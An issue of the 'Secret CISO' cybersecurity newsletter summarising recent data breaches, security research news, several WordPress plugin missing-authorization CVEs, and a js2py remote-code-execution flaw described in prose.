Welcome to today's issue of Secret CISO, your daily dose of cybersecurity insights. Today, we're diving into the world of data breaches, exploring how they're impacting organizations across the globe. First, we'll be discussing the upcoming event “Hacking the Materiality of a Data Breach” on Super Cyber Friday, and how SEC regulations could potentially shape incident response playbooks. We'll also touch on the shifting public opinion regarding data breaches. In the news, AMD is under investigation for a potential data breach, with notorious cybercriminal Intelbroker claiming responsibility. We'll delve into the details of this alleged breach and its potential implications. Meanwhile, nearly 20,000 patients of behavioral health engagement company Aptihealth have been affected by a data breach, highlighting the ongoing vulnerability of healthcare data. In other news, the Association of Texas Professional Educators is under investigation following a data breach in February, and we'll be discussing why data still leaks through enterprise DLP solutions.

We'll also be looking at the recent data breach affecting Maxicare, and the FTC's complaint against TikTok for alleged data privacy practices. Finally, we'll be exploring the latest research in cybersecurity, including the adoption of zero trust, SSE, SASE to enhance network access security, and the latest findings from LevelBlue Labs. Stay tuned for all this and more in today's issue of Secret CISO. Stay safe, stay informed.

Data Breaches

1. AMD Investigates Potential Data Breach: AMD, a global computing powerhouse, is currently investigating a potential data breach after a hacker claimed to have obtained a database from the company and put it up for sale on a dark web forum. The alleged breach was first reported by Intelbroker, a notorious cybercriminal. Source: TechRadar, The Verge
2. Aptihealth Patients Affected by Business Associate Data Breach: Nearly 20,000 patients of behavioral health engagement company Aptihealth have been affected by a data breach. The breach was announced by the company, highlighting the ongoing vulnerability of health data. Source: HIPAA Journal
3. Association of Texas Professional Educators Data Breach: The Association of Texas Professional Educators (ATPE) experienced a data breach on February 12, 2024, after identifying unusual activity within its computer network. The ATPE has since secured its network and is working with law enforcement to investigate the incident. Source: Wire19
4. Maxicare Data Breach: Maxicare, a health insurance provider, confirmed a data breach that affected less than 1% of its member population. The company was alerted to the potential security incident on June 13 and has since assured members that no medical data was stolen. Source: Manila Standard
5. LendingTree Probes Potential Snowflake-Related Data Breach: LendingTree is currently investigating a potential data breach related to Snowflake, a cloud-based data warehousing platform. The details of the breach, including the number of affected users and the type of data potentially compromised, have not been disclosed. Source: BNN Bloomberg

Security Research

1. Kraken Crypto Exchange Extortion Attempt: Kraken, a popular cryptocurrency exchange, faced an extortion attempt from a security researcher who discovered a bug but refused to disclose specifics. The situation highlights the importance of ethical conduct in cybersecurity research. Source: Finbold
2. Microsoft Corporate Email Spoofing Bug: A security researcher publicized a flaw that allows threat actors to spoof Microsoft corporate emails, potentially enabling phishing attacks. Microsoft initially dismissed the disclosure. Source: SC Media
3. LevelBlue Labs' Evasive Loader Research: LevelBlue Labs, a managed security services provider, released new research on an evasive loader targeting Chinese-speaking victims. The threat actor behind this has not yet been classified as an advanced persistent threat (APT). Source: BusinessWire
4. Markopolo's Scam Targeting Crypto Users: Security researcher Manoj Kumar warned about a scam by Markopolo targeting cryptocurrency users through fake meeting software. The scam involves distributing a URL linking to cloud storage via text messages that appear authentic. Source: The Hacker News
5. Chrome 126 Update Patches Vulnerability: Google's Chrome 126 update patches a vulnerability that was exploited at a hacking competition. The security defects were reported by a security researcher known as 'wgslfuzz'. Source: SecurityWeek

Top CVEs

1. CVE-2023-48759 - Missing Authorization in Crocoblock JetElements For Elementor: This vulnerability affects JetElements For Elementor, where an attacker can exploit missing authorization checks. Users are advised to update to the latest version. Source: CVE-2023-48759
2. CVE-2023-47770 - Missing Authorization in Muffin Group Betheme: Betheme by Muffin Group has a missing authorization vulnerability. Users are recommended to update to the latest version to mitigate this vulnerability. Source: CVE-2023-47770
3. CVE-2023-47771 - Missing Authorization in ThemePunch OHG Essential Grid: Essential Grid by ThemePunch OHG is affected by a missing authorization vulnerability. Users are advised to update to the latest version. Source: CVE-2023-47771
4. CVE-2023-47681 - Missing Authorization in QuadLayers WooCommerce Checkout Manager: QuadLayers WooCommerce Checkout Manager has a missing authorization vulnerability. Users are recommended to update to the latest version to mitigate this vulnerability. Source: CVE-2023-47681
5. CVE-2023-45658 - Missing Authorization in POSIMYTH Nexter: Nexter by POSIMYTH has a missing authorization vulnerability. Users are advised to update to the latest version. Source: CVE-2023-45658

API Security

1. Exploit for CVE-2024-28397 in js2py: A vulnerability has been discovered in the js2py python package, which is widely used by web scrapers to parse JavaScript code. The flaw lies in the implementation of a global variable within js2py, allowing an attacker to obtain a reference to a python object in the js2py environment. This can enable the attacker to escape the js environment and execute arbitrary commands on the host. The threat actor can host a website containing a malicious js file or send a malicious script via HTTP API for the victim to parse, leading to remote code execution on the host. Source: Vulners

Sponsored by Wallarm API Security Solution

Final Words

As we wrap up today's edition of Secret CISO, we hope you found our insights on data breaches, cybersecurity, and incident response playbooks valuable. The world of cybersecurity is ever-evolving, and it's crucial to stay informed and prepared. Remember, cybersecurity is not just the responsibility of a single department or individual - it's a collective effort. Share this newsletter with your colleagues and friends to help them stay updated on the latest trends and threats in the cybersecurity landscape. Join us again on 7-12-24 for our next edition, "Hacking the Materiality of a Data Breach" – Super Cyber Friday.

We'll delve into how SEC regulations impact incident response playbooks and explore the shifting public opinion on data breaches. Stay safe, stay informed, and let's continue to strengthen our defenses against the ever-present cyber threats.